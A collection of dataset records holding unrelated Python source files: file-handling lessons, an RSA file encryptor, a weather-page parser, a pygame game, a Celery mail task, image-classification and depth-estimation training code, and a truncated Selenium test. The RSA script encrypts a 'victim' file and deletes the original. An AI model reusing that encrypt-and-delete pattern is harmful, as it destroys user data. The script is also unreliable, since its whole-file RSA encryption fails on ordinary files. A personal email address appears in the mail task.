τωρα=',z)\r\n\r\nf=open('file1.txt','r')\r\ns1=f.read(5)\r\nprint ('Διαβασε 5 στοιχεια απο το αρχειο=',s1)\r\ns2=f.read(19)\r\nprint ('Διαβασε τα επομενα 19 στοιχεια απο το αρχειο=',s2)\r\ns2=f.read(25)\r\nprint ('Διαβασε τα επομενα 25 στοιχεια απο το αρχειο οσα υπαρχουν=',s2)\r\nf.close()\r\n#open file for read\r\nf=open('file1.txt','r')\r\n\r\n# pieces reading\r\ns1=f.read(5)\r\nprint ('Διαβασε 5 στοιχεια απο το αρχειο=',s1)\r\nprint ('Διαβασε και επεστρεψε την τρεχουσα θεση=',f.tell())\r\ns2=f.read(19)\r\nprint ('Διαβασε τα επομενα 19 στοιχεια απο το αρχειο=',s2)\r\nprint ('Διαβασε και επεστρεψε την τρεχουσα θεση=',f.tell())\r\ns2=f.read(25)\r\nprint ('Διαβασε τα επομενα 25 στοιχεια απο το αρχειο οσα υπαρχουν=',s2)\r\nprint ('Διαβασε και επεστρεψε την τρεχουσα θεση =',f.tell())\r\nf.close()\r\n\r\n# seek\r\nf=open('file1.txt','r+')#diavazei kai prosthetei sto arxeio r+\r\nf.write('0123456789abcdef')\r\nf.seek(0)\r\nprint('************************************************************************')\r\nprint('Αυτο εχει προστεθει στην αρχη του αρχειου=',f.read(16))\r\nf.write('0123456789abcdef')\r\nf.seek(5) # Go to the 6th byte in the file\r\nprint ('Aπo το 5ο byte και μετα διαβαζω 2 στοιχεια=',f.read(2)) \r\nf.seek(13) # Go to the 3rd byte before the end\r\nprint ('Aπο το 13ο byte και μετα διαβαζω 1 στοιχειο=',f.read(1))\r\nprint('************************************************************************')\r\n#--------------------------------------------------------------------------------------------------------------------\r\n#anoigma kai diavasma arxeiou\r\nfile = open ( 'words.dat' , 'w' )\r\nword = ','\r\nwhile word != 'END' :\r\n word = input ( 'Δωσε μια λεξη θα την βρεις στο αρχειο words.dat (γραψε END για εξοδο): ')\r\n file.write ( word + ',' )\r\nfile.close ( )\r\nfile=open('words.dat','r')\r\nf=file.readlines()\r\nprint(f)\r\nfile.close()\r\n","sub_path":"python33/arxeio_listes_metrima_hmerominia/arxeio_file_kai_words.py","file_name":"arxeio_file_kai_words.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"67736634","text":"def rsa_enc(file_to_encrypt):\n import rsa, os, re\n\n with open(\"pub_key.txt\", \"w\") as pub, open(\"priv_key.txt\", \"w\") as priv:\n pub_k, priv_k = rsa.newkeys(1024)\n pub.write(str(pub_k))\n priv.write(str(priv_k))\n with open(file_to_encrypt, \"rb\") as victim, open(\"pub_key.txt\", \"r\") as pub_k, \\\n open(file_to_encrypt + \".crp\", \"wb\") as new:\n pub_k = pub_k.read()\n e = re.findall(r\"\\((\\d+)\", pub_k)[0]\n n = re.findall(r\"(\\d+)\\)\", pub_k)[0]\n new.write(rsa.encrypt(victim.read(), rsa.PublicKey(int(e), int(n))))\n os.remove(file_to_encrypt)\n\n\ndef rsa_dec(file_to_decrypt):\n import rsa, re, os\n with open(file_to_decrypt, \"rb\") as old, open(\"priv_key.txt\", \"r\") as priv_k, \\\n open(file_to_decrypt[:file_to_decrypt.rfind(\".\")], \"w\") as notvictim:\n priv_k = priv_k.read()\n e = re.findall(\"\\((\\d+)\", priv_k)[0]\n n = re.findall(\"\\, (\\d+)\", priv_k)[0]\n d = re.findall(\"\\, (\\d+)\", priv_k)[1]\n p = re.findall(\"\\, (\\d+)\", priv_k)[2]\n q = re.findall(\"\\, (\\d+)\\)\", priv_k)[0]\n notvictim.write(str(rsa.decrypt(old.read(), rsa.PrivateKey(int(e), int(n), int(d), int(p), int(q)))))\n os.remove(file_to_decrypt)\n os.remove(\"priv_key.txt\")\n os.remove(\"pub_key.txt\")\n","sub_path":"Practiсe7/rsa_cipher.py","file_name":"rsa_cipher.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293358316","text":"import re\nimport datetime\n\nfrom .abstract import Parser\nfrom ..labels import DATA_LABELS as DL\n\n\nclass WeatherlinkParser(Parser):\n\n def parse(self, content, **kwargs):\n self.content = content\n\n data = {}\n data[DL['TIME']] = self._clean_time_timestamp(self.get_timestamp())\n data[DL['DATE']] = self._clean_date_timestamp(self.get_timestamp())\n\n temperatures = self.get_temperature()\n if temperatures:\n data[DL['TEMP']] = self._clean(temperatures[0], 'temp')\n data[DL['TEMP_MAX']] = self._clean(temperatures[1], 'temp')\n data[DL['TEMP_MAX_TIME']] = self._clean(temperatures[2], 'time')\n data[DL['TEMP_MIN']] = self._clean(temperatures[3], 'temp')\n data[DL['TEMP_MIN_TIME']] = self._clean(temperatures[4], 'time')\n\n humidity = self.get_humidity()\n if humidity:\n data[DL['HUMIDITY']] = self._clean(humidity[0], 'humidity')\n data[DL['HUMIDITY_MAX']] = self._clean(humidity[1], 'humidity')\n data[DL['HUMIDITY_MAX_TIME']] = self._clean(humidity[2], 'time')\n data[DL['HUMIDITY_MIN']] = self._clean(humidity[3], 'humidity')\n data[DL['HUMIDITY_MIN_TIME']] = self._clean(humidity[4], 'time')\n\n dew = self.get_dew()\n if dew:\n data[DL['DEW']] = self._clean(dew[0], 'dew')\n data[DL['DEW_MAX']] = self._clean(dew[1], 'dew')\n data[DL['DEW_MAX_TIME']] = self._clean(dew[2], 'time')\n data[DL['DEW_MIN']] = self._clean(dew[3], 'dew')\n data[DL['DEW_MIN_TIME']] = self._clean(dew[4], 'time')\n\n pressure = self.get_pressure()\n if pressure:\n data[DL['PRESSURE']] = self._clean(pressure[0], 'pressure')\n data[DL['PRESSURE_MAX']] = self._clean(pressure[1], 'pressure')\n data[DL['PRESSURE_MAX_TIME']] = self._clean(pressure[2], 'time')\n data[DL['PRESSURE_MIN']] = self._clean(pressure[3], 'pressure')\n data[DL['PRESSURE_MIN_TIME']] = self._clean(pressure[4], 'time')\n\n wind_strength = self.get_wind_strength()\n if wind_strength:\n data[DL['WIND']] = self._clean(wind_strength[0], 'wind')\n data[DL['WIND_MAX']] = self._clean(wind_strength[1], 'wind')\n data[DL['WIND_MAX_TIME']] = self._clean(wind_strength[2], 'time')\n\n wind_dir = self.get_wind_dir()\n if wind_dir:\n data[DL['WIND_DIR']] = self._clean(wind_dir[0], 'wind_dir')\n data[DL['WIND_DIR_MAX']] = None # not provided\n\n rain = self.get_rain()\n if rain:\n data[DL['RAIN_RATE']] = self._clean(rain[0], 'rain')\n data[DL['RAIN']] = self._clean(rain[1], 'rain_rate')\n data[DL['RAIN_MONTH']] = self._clean(rain[2], 'float')\n data[DL['RAIN_YEAR']] = self._clean(rain[3], 'float')\n data[DL['RAIN_RATE_MAX']] = None # not provided\n data[DL['RAIN_RATE_MAX_TIME']] = None # not provided\n\n return data\n\n def get_timestamp(self):\n\n matches = re.search(\n 'Current Conditions as of (\\d+:\\d+\\s(?:[^ ]+),\\s[^ ]+\\s\\d+,\\s\\d+)', # noqa\n self.content,\n flags=re.IGNORECASE\n )\n if matches is not None:\n return matches.group(1)\n\n def _clean_time_timestamp(self, value):\n return datetime.datetime.strptime(value.strip(), '%H:%M %A, %B %d, %Y').time() # noqa\n\n def _clean_date_timestamp(self, value):\n return datetime.datetime.strptime(value.strip(), '%H:%M %A, %B %d, %Y').date() # noqa\n\n def get_temperature(self):\n\n matches = re.search(\n 'Outside Temp.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([\\d:]+)<.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n matches.group(5),\n )\n return None\n\n def get_humidity(self):\n\n matches = re.search(\n 'Outside Humidity.*\\n.*?>([-\\d.]+)%<.*\\n.*?>([-\\d.]+)%<.*\\n.*?>([\\d:]+)<.*\\n.*?>([-\\d.]+)%<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n matches.group(5),\n )\n return None\n\n def get_dew(self):\n\n matches = re.search(\n 'Dew Point.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([\\d:]+)<.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n matches.group(5),\n )\n return None\n\n def get_pressure(self):\n\n matches = re.search(\n 'Barometer.*\\n.*?>([-\\d.]+)[^<]+<.*\\n.*?>([-\\d.]+)[^<]+<.*\\n.*?>([\\d:]+)<.*\\n.*?>([-\\d.]+)[^<]+<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n matches.group(5),\n )\n return None\n\n def get_wind_strength(self):\n matches = re.search(\n 'Wind Speed.*\\n.*?>(.+?) ?(km/h)?<.*\\n.*?>([-\\d.]+) km/h<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n '0' if matches.group(1) == 'Calm' else matches.group(1),\n matches.group(3),\n matches.group(4),\n )\n return None\n\n def get_wind_dir(self):\n matches = re.search(\n 'Wind Direction.*\\n.*?>(.+?)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n None\n )\n return None\n\n def get_rain(self):\n\n matches = re.search(\n 'Rain.*\\n.*?>([-\\d.]+)mm/Hour<.*\\n.*?>([-\\d.]+)mm<.*\\n.*?>.*?<.*\\n.*?>([-\\d.]+)mm<.*\\n.*?>([-\\d.]+)mm<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n )\n return None\n","sub_path":"torinometeo/realtime/fetch/parsers/weatherlink.py","file_name":"weatherlink.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"508332400","text":"import pygame\nimport time\nimport random\n\nfrom player import Player\nfrom coin import Coin\nfrom obstacle import Obstacle\n\nfrom functions import *\n \npygame.init()\n \ndisplay_width = 800\ndisplay_height = 600\n \n \n \nscreen = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption(\"Jetpack\")\nclock = pygame.time.Clock()\n\n\n#Load background\nbg1 = pygame.image.load(\"bg_mountains.png\").convert()\nbg2 = pygame.image.load(\"bg_mountains.png\").convert()\n\n\ndef game_loop():\n\n\tDistance = 0;\n\tcoinTotal = 0\n\t\n\t#Background variables\n\tbg1_x = 0\n\tbg2_x = bg1.get_width()\n\tbg_speed = 5\n\n\t#list of sprites\n\tplayer_sprite = pygame.sprite.Group()\n\n\tcoin_group = pygame.sprite.Group()\n\n\trocket_group = pygame.sprite.Group()\n\n\t#Initialize player called \"jet\"\n\tjet = Player()\n\tjet.rect.x = 200\n\tjet.rect.y = 300\n\n\t#add to list of all sprites\n\tplayer_sprite.add(jet)\n\n\tgameOver = False\n\n\t#initial speed of jet\n\tspeed = 0\n\n\t#Initial place of random coin\n\tnewCoinY = 300;\n\n\twhile not gameOver:\n\n\t\t#dABckgorund scrolling\n\n\t\tbg1_x = scroll_BG(screen, bg1_x, bg2_x, 1600, 1, bg1, bg2)\n\t\tbg2_x = scroll_BG(screen, bg1_x, bg2_x, 1600, 2, bg1, bg2)\n\n\t\t#display distance\n\t\t\n\t\tdistance_display(screen, Distance)\n\t\tDistance += 1\n\t\t\n\t\t#display coin total\n\t\t\n\t\tcoin_display(screen, coinTotal)\n\t\t\n\t\t#event handling\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tquit()\n\n\t\tkeys = pygame.key.get_pressed()\n\n\n\n\t\tif keys[pygame.K_UP] or keys[pygame.K_w]:\n\t\t\t\tspeed += 2\n\t\t\t\t#if hits bound reset acceleration\n\t\t\t\tif (jet.moveUp(speed, display_height)) == 1:\n\t\t\t\t\tspeed = 0\n\n\t\telse: \n\t\t\t#if not going up, apply gravity\n\t\t\tspeed -= 3\n\t\t\t#stop accelating if hits boundary\n\t\t\tif (jet.moveUp(speed, display_height)) == 1:\n\t\t\t\t\tspeed = 0\n\t\t\n\n\t\t#draw coins and rockets\n\n\t\tif (Distance % 29) == 0: \n\n\t\t\tcoin = Coin(newCoinY, 100)\n\t\t\tnewCoinY = coin.rect.y\n\t\t\tcoin_group.add(coin)\n\n\t\t\t#This next bit of code will place rocket above the coin if its in bottom half\n\t\t\t#otheriwse it will palce the rocket below the coin\n\t\tif (Distance % 37) == 0:\n\t\t\tif newCoinY < display_height/2 :\n\t\t\t\trocket = Obstacle(newCoinY+80)\n\t\t\telse:\n\t\t\t\trocket = Obstacle(newCoinY-80)\n\n\t\t\trocket_group.add(rocket)\n\n\n\n\n\n\t\tif (pygame.sprite.groupcollide(player_sprite, coin_group, False, True, collided = None)):\n\t\t\tcoinTotal += 10\n\n\t\tif (pygame.sprite.groupcollide(player_sprite, rocket_group, True, True, pygame.sprite.collide_mask)):\n\t\t\tgameOver = True\n\t\t\tif coinTotal > get_hi_score() :\n\t\t\t\tnew_HI = True\n\t\t\t\tsave_hi_score(coinTotal)\n\t\t\telse:\n\t\t\t\tnew_HI = False\n\n\t\t#Update all sprites\n\t\tplayer_sprite.update()\n\t\tcoin_group.update(10)\n\t\trocket_group.update(12)\n\n\n\t\t#Draw all sprites\n\t\tplayer_sprite.draw(screen)\n\t\tcoin_group.draw(screen)\n\t\trocket_group.draw(screen)\n\n\n\t\t#Update screen\n\t\tpygame.display.flip()\n\n\n\t\tclock.tick(60)\n\n\t\tif gameOver:\n\t\t\thi_score(screen, game_loop, new_HI)\n\n\n\n\ngame_intro(screen, game_loop)\npygame.quit()\nquit()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"195020575","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport smtplib\n\nfrom django.conf import settings\nfrom django.core.mail import EmailMessage\nfrom django.contrib.auth.models import User\n\nfrom celery import current_app as app\nfrom celery.utils.log import get_task_logger\n\nlogger = get_task_logger(__name__)\n\n\n@app.task(name='celerymail.send_html_mail', autoretry_for=(Exception,), max_retries=3, default_retry_delay=60)\ndef send_html_mail_task(subject, content, recipient_list, filepath=None):\n logger.info('celerymail.send_html_mail - %s - %s' % (subject, recipient_list))\n try:\n msg = EmailMessage(subject, content, settings.EMAIL_HOST_USER, recipient_list)\n msg.content_subtype = \"html\"\n if filepath:\n msg.attach_file(filepath)\n msg.send()\n except smtplib.SMTPRecipientsRefused:\n user = User.objects.get(email=recipient_list[0])\n content = user.first_name + \":\" + user.email + \"邮箱有误,请修改.\"\n msg = EmailMessage(\n \"DTS用户邮箱错误\", content, settings.EMAIL_HOST_USER,\n ['lei.zhang1@100credit.com', settings.EMAIL_HOST_USER]\n )\n msg.content_subtype = \"html\"\n msg.send()\n","sub_path":"develop/DTS/celerymail/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"563069363","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 2 19:16:41 2021\n\n@author: kubra\n\"\"\"\n\nimport cv2\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.style.use('ggplot')\nimport sys\nsys.path.append('../common/')\nimport os\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix, accuracy_score, classification_report\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom skimage import feature\n\n\n\ntrain_path = 'D:/proje/ICIAR2018_BACH_Challenge/patch256_thresh110_son/'\n\noutput_folder = \"output\"\n#bins for colour histogram\nbins = 32\nrandom_seed = 9 \n\n\n\ndef sift_feature(image):\n gray= cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n sift = cv2.xfeatures2d.SIFT_create()\n # Computing key points \n kp, dsc = sift.detectAndCompute(gray, None) # get keypoint and descriptor\n img = dsc.mean(axis=0)\n return img\n\n\nlabels = []\nfeatures = []\n# filter all the warnings\nimport warnings\nwarnings.filterwarnings('ignore')\n\ntrain_labels = os.listdir(train_path)\ntrain_labels.sort()\n\n# Iterate over the training images:\nfor typefile in train_labels:\n lesiontype = os.listdir(os.path.join(train_path,typefile))\n current_label = typefile\n for filename in lesiontype: \n imgpath = os.path.join(train_path,typefile,filename)\n image = cv2.imread(imgpath)\n print(imgpath)\n feature = sift_feature(image)\n labels.append(current_label)\n features.append(feature)\n \n\n \n\n\nprint (\"[STATUS] completed Global Feature Extraction...\")\nprint (\"[STATUS] feature vector size {}\".format(np.array(features).shape))\nprint (\"[STATUS] training Labels {}\".format(np.array(labels).shape))\n\nprint(\"one feature example:\\n\")\nprint(features[1])\nprint(\"\\n\")\nlen(features),len(labels)\n\nprint (\"[STATUS] completed Global Feature Extraction...\")\n\n# get the overall feature vector size\nprint (\"[STATUS] feature vector size {}\".format(np.array(features).shape))\n\n# get the overall training label size\nprint (\"[STATUS] training Labels {}\".format(np.array(labels).shape))\n\ntargetNames = np.unique(labels)\nle = LabelEncoder()\ntarget = le.fit_transform(labels)\nprint (\"[STATUS] training labels encoded...\")\n\n# normalize the feature vector in the range (0-1)\nscaler = MinMaxScaler(feature_range=(0, 1))\nrescaled_features = scaler.fit_transform(features)\nprint (\"[STATUS] feature vector normalized...\")\n\nprint (\"[STATUS] target labels: {}\".format(target))\nprint( \"[STATUS] target labels shape: {}\".format(target.shape))\n\nrescaled_features= np.nan_to_num(rescaled_features,0)\n\n\nmodels = []\nmodels.append(('KNN', KNeighborsClassifier(n_neighbors=7)))\nmodels.append(('RF', RandomForestClassifier(n_estimators=700, random_state=9)))\nmodels.append(('SVM', SVC(C=200,gamma=2)))\n\nresults = []\nnames = []\nscoring = \"accuracy\"\n\n(trainDataGlobal, testDataGlobal, trainLabelsGlobal, testLabelsGlobal) = train_test_split(np.array(rescaled_features),\n np.array(target),\n test_size=0.2,\n random_state=9)\nprint(\"\\n\")\nprint(\"************************************************************\")\nprint(\"K-Fold Results\")\nprint(\"************************************************************\")\nprint(\"\\n\")\n\nfor name, model in models:\n kfold = KFold(n_splits=5, random_state=9)\n cv_results = cross_val_score(model, trainDataGlobal, trainLabelsGlobal, cv=kfold, scoring=scoring)\n print(cross_val_score(model, trainDataGlobal,trainLabelsGlobal, cv=kfold, scoring=scoring))\n results.append(cv_results)\n names.append(name)\n msg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\n print(msg)\n \n \nprint(\"\\n\") \nprint(\"************************************************************\")\nprint(\"************************************************************\")\nprint(\"\\n\")\n\nfrom sklearn import metrics\nfor name, model in models:\n clf=model\n clf.fit(trainDataGlobal, trainLabelsGlobal)\n y_pred=clf.predict(testDataGlobal)\n msg = \"%s: %f \" % (name, metrics.accuracy_score(y_pred,testLabelsGlobal))\n print(msg)\n \ntarget_names = ['Benign', 'InSitu', 'Invasive', 'Normal']\nprint(classification_report(testLabelsGlobal, y_pred, target_names=target_names))\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import plot_confusion_matrix\n\nplot_confusion_matrix(clf, testDataGlobal, testLabelsGlobal) \nplt.show() ","sub_path":"Feature Extraction/sift.py","file_name":"sift.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453966505","text":"#!/usr/bin/python\nimport json\n\nfrom django import template\nfrom ..util import aspect_ratio_percent, HAS_THUMBNAILER, get_thumbnail_shim\nfrom django.conf import settings\nregister = template.Library()\n\n\ntry:\n FLEXIBLE_IMAGE_SIZES = settings.FLEXIBLE_IMAGE_SIZES\nexcept:\n # Image sizes. These should be in size order, smallest first.\n FLEXIBLE_IMAGE_SIZES = [\n 480,\n 768,\n 1024,\n 1280,\n 1440,\n ]\n\n\n@register.inclusion_tag(\"flexible-images/flexible-image.html\", takes_context=True)\ndef flexible_image(context, src, container=\"div\", classes=\"\", alt=\"\", background_image=False):\n rv = {\n \"container\": container,\n \"classes\": classes,\n \"aspect_padding_bottom\": aspect_ratio_percent(src),\n \"alt\": alt,\n \"background_image\": background_image,\n }\n\n # We can't do any of the srcset (or JS switching fallback) if we don't\n # have a thumbnail library installed.\n if not HAS_THUMBNAILER:\n rv[\"image\"] = src\n return rv\n # For browsers that support srcset: Give them all the sizes and let the\n # browser decide what to use.\n # For ones that do not: Serve up the first image (which should be the\n # smallest), then swap it out with a larger version in JS if their device\n # merits it.\n first = True\n sizes = []\n for size in FLEXIBLE_IMAGE_SIZES:\n image = get_thumbnail_shim(src, size)\n sizes.append({\n \"url\": image.url,\n \"width\": image.width,\n \"height\": image.height,\n })\n if first:\n rv[\"image\"] = image\n first = False\n rv[\"image_sizes\"] = sizes\n rv[\"image_sizes_json\"] = json.dumps(sizes)\n return rv\n\n\n@register.inclusion_tag(\"flexible-images/images-loading.html\")\ndef flexible_image_js(selector=\".flexible-image\"):\n ctx = {\n \"selector\": selector,\n }\n return ctx\n","sub_path":"flexible_images/templatetags/flexible_images.py","file_name":"flexible_images.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535386863","text":"from argparse import ArgumentParser\nimport os\n\nimport torch\nfrom torchvision.models import densenet169\nfrom tensorboardX import SummaryWriter\nfrom torch.distributions import Normal\n\nfrom distributions import NormalWishartPrior, GaussianDiagonalMixture\n\nfrom utils.data_loading import getTrainingEvalDataKITTI, getTrainingEvalData\n\nfrom distributions.distribution_wrappers import ProbabilisticWrapper\nfrom models.unet_model import UNetModel\nfrom training.kitti_trainers import KittiNLLDistributionTrainer\nfrom training.kitti_trainers import KittiDistillationTrainer\nfrom training.kitti_trainers import KittiL1SSIMTrainer, KittiRKLTrainer\nfrom utils.model_utils import load_unet_model_from_checkpoint\nfrom utils.model_utils import _load_densenet_dict\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(\n description='Probabilistic Monocular Depth Estimation on KITTI'\n )\n parser.add_argument(\n '--backbone', default='densenet169',\n choices=['resnet18', 'densenet169']\n )\n parser.add_argument('--path_to_kitti', type=str)\n parser.add_argument('--path_to_csv_train', type=str)\n parser.add_argument('--path_to_csv_val', type=str)\n parser.add_argument(\n '--ood_zip_path', default='none', type=str,\n help=\"Path to zip containing ood data (for RKL training only)\"\n )\n parser.add_argument(\n '--checkpoint', required=True, type=str,\n help=\"Name of the folder to save model/trainer states to\"\n )\n parser.add_argument('--pretrained_path', default=None, type=str)\n parser.add_argument('--teacher_checkpoints', default=None, nargs='+')\n parser.add_argument(\n '--epochs', default=20, type=int,\n help='number of total epochs to run'\n )\n parser.add_argument('--model_type', default='gaussian', choices=[\n 'gaussian', 'nw_prior', 'l1-ssim', 'nw_prior_rkl', 'nw_end', 'hydra'\n ])\n parser.add_argument('--lr', default=1e-4)\n parser.add_argument('--warmup_steps', default=1000, type=int)\n parser.add_argument('--bs', default=8, type=int, help='batch size')\n parser.add_argument(\n '--log_dir', default=\"\", type=str,\n help='Directory to save tensorboard logs'\n )\n parser.add_argument(\n '--state_dict', default=None, type=str,\n help='Continue training from a given state dict'\n )\n parser.add_argument(\n '--targets_transform', type=str, default='scaled',\n choices=['inverse', 'scaled', 'log'],\n help=\"Type of transformation to perform with targets\"\n )\n parser.add_argument(\n '--overfit_check', dest='overfit', action='store_true', default=False,\n help=\"If true, uses a tiny subset of the whole train\"\n )\n parser.add_argument('--max_temperature', default=10.0, type=float)\n parser.add_argument('--rkl_inv_beta', default=1e-2, type=float)\n parser.add_argument('--rkl_ood_coeff', default=1.0, type=float)\n parser.add_argument('--rkl_warmup_steps', default=30000, type=int)\n parser.add_argument('--rkl_prior_beta', default=1e-2, type=float)\n args = parser.parse_args()\n\n for path in [args.checkpoint, args.path_to_kitti]:\n if not os.path.isdir(path):\n raise ValueError(\n \"Incorrect path to folder:\" + path\n )\n\n # Load model\n if args.model_type != 'hydra':\n channels = {\n 'l1-ssim': 1,\n 'gaussian': 2, 'nw_prior': 3, 'nw_prior_rkl': 3, 'nw_end': 2\n }[args.model_type]\n if args.model_type == 'hydra':\n channels = len(args.teacher_checkpoints) * 2\n if args.pretrained_path is None:\n model = UNetModel(args.backbone, out_channels=channels).cuda()\n else:\n model = UNetModel(\n args.backbone, pretrained=False, out_channels=channels\n ).cuda()\n\n loaded_densenet = densenet169(pretrained=False)\n _load_densenet_dict(loaded_densenet, args.pretrained_path)\n model.encoder.original_model = loaded_densenet.features.cuda()\n if args.model_type == 'nw_prior_rkl':\n # Adjust L and \\beta initialization for RKL\n model.decoder.conv3.weight[0].data.mul_(10)\n model.decoder.conv3.weight[1].data.mul_(0.001)\n model = torch.nn.DataParallel(model)\n if args.model_type == 'gaussian' or args.model_type == 'nw_end':\n model = ProbabilisticWrapper(Normal, model)\n elif 'nw' in args.model_type:\n model = ProbabilisticWrapper(\n NormalWishartPrior, model\n )\n elif args.model_type == 'hydra':\n model = ProbabilisticWrapper(\n GaussianDiagonalMixture, model\n )\n print(\"Model created\")\n\n if args.teacher_checkpoints is not None:\n teacher_model = load_unet_model_from_checkpoint(\n args.teacher_checkpoints, \"gaussian-ensemble\", args.backbone\n )\n\n logdir = args.log_dir\n if logdir == '':\n logdir = 'logs/' + '{}-lr{}-e{}-bs{}'.format(\n args.backbone, args.lr, args.epochs, args.bs\n )\n\n # Create trainer\n if args.model_type == 'l1-ssim':\n print(\"Training with original loss\")\n trainer_cls = KittiL1SSIMTrainer(\n model, torch.optim.Adam, SummaryWriter, logdir,\n epochs=args.epochs, optimizer_args={\n 'lr': args.lr, 'amsgrad': True, 'warmup_steps': args.warmup_steps\n }\n )\n elif args.model_type == 'gaussian':\n print(\"Training with NLL objective\")\n trainer_cls = KittiNLLDistributionTrainer(\n model, torch.optim.Adam, SummaryWriter, logdir,\n epochs=args.epochs, optimizer_args={\n 'lr': args.lr, 'amsgrad': True, 'warmup_steps': args.warmup_steps\n },\n additional_params={'targets_transform': args.targets_transform}\n )\n elif args.teacher_checkpoints is not None:\n if args.model_type == 'nw_end':\n print(\"Distilling with pairwise kl divergence\")\n elif args.model_type == 'hydra':\n print(\"Distilling into multiple heads simultaneously\")\n else:\n print(\"Distilling with log prob\")\n max_T = args.max_temperature\n trainer_cls = KittiDistillationTrainer(\n teacher_model, max_T,\n model, torch.optim.Adam, SummaryWriter, logdir,\n args.epochs, {'lr': args.lr, 'amsgrad': True, 'warmup_steps': args.warmup_steps},\n additional_params={'targets_transform': args.targets_transform}\n )\n else:\n print(\"Performing RKL training with custom OOD data\")\n ood_loader, _ = getTrainingEvalData(\n path=args.ood_zip_path, batch_size=args.bs,\n sanity_check=args.overfit, is_ood=True, indata='kitti'\n )\n trainer_cls = KittiRKLTrainer(\n model, torch.optim.Adam, SummaryWriter, logdir,\n epochs=args.epochs, optimizer_args={\n 'lr': args.lr, 'amsgrad': True, 'warmup_steps': args.warmup_steps\n },\n additional_params={\n 'targets_transform': args.targets_transform,\n 'inv_real_beta': args.rkl_inv_beta,\n 'ood_coeff': args.rkl_ood_coeff,\n 'prior_beta': args.rkl_prior_beta,\n \"ood_coeff_warmup\": args.rkl_warmup_steps\n }\n )\n print(\"Trainer created\")\n\n # Load data\n train_loader, val_loader = getTrainingEvalDataKITTI(\n path_to_kitti=args.path_to_kitti,\n path_to_csv_train=args.path_to_csv_train,\n path_to_csv_val=args.path_to_csv_val,\n batch_size=args.bs,\n )\n print(\"Data loaded\")\n\n print(\"Training...\")\n if args.model_type == 'nw_prior_rkl':\n trainer_cls.train(\n train_loader, val_loader, ood_loader,\n args.checkpoint, args.state_dict\n )\n else:\n trainer_cls.train(\n train_loader, val_loader, args.checkpoint, args.state_dict\n )\n","sub_path":"kitti_train.py","file_name":"kitti_train.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"548812875","text":"#Ensure that we can import the main testing library\nimport sys\nimport os\nimport random\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nfrom selenium_tests.interfaces import login as loginPage\n\n#Testing library modules\nfrom selenium_tests.actors import *\nfrom selenium_tests.actions import *\nfrom selenium_tests.questions import *\n\n#Local test modules\nfrom actors import *\nfrom actions import *\nfrom questions import *\n\n#Selenium Webdriver libraries\nfrom selenium import webdriver\n\n#Testing code start\njames = James()\n\n#Login\njames.attemptsTo(login)\njames.mustBe(loggedIn)\njames.attemptsTo(gotoProjects)\njames.mustBe(atProjectsMain)\n\n#Edit\njames.attemptsTo(gotoFirstProject)\njames.mustBe(atInfo)\n\ndata = {}\ndata['short_file'] = '256x256.png'\ndata['filename'] = os.getcwd() + data['short_file']\ndata['title'] = 'Title 